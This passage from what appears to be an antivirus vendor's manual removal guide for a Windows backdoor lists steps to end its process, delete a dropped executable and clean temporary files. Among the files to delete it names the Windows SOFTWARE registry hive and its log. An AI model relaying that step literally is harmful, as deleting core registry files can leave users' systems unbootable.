  3. Run a full scan of your computer.


Manual removal*

  1. Scan the system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:1616

  3. Delete the original Backdoor file.
  4. Delete or disinfect the following files created/modified by the Backdoor:

    %System%\config\software (3251 bytes)
    %System%\config\SOFTWARE.LOG (5347 bytes)
    %WinDir%\AppPatch\jsvlax.exe (1951 bytes)

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
